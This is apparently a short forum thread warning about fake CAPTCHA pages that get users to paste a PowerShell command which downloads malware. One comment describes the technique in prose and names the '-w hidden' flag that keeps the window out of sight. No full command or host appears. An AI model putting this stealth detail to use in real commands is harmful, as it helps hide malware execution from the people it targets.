Anything beyond checking(.) of those images required in their boxes looks suspicious , just that most inexperienced/unaware users will likely fall for it
Threat actors are getting really creative these days and it's very scary that they use normal harmless processing for their malicious activities.
Yes, they are getting creative and part of that creativity is what OP mentioned. There have been fake captchas before as well, only now they use more polished tricks to make them less suspicious and more effective.
This method relies on a shorthand way of executing a command with PowerShell(PS), which then downloads malware or a text file containing extra commands that can trigger the download process...The tricky part is that , the process is less suspicious because the copied command often includes the param
”-w hidden” to make PowerShell run quietly in the background.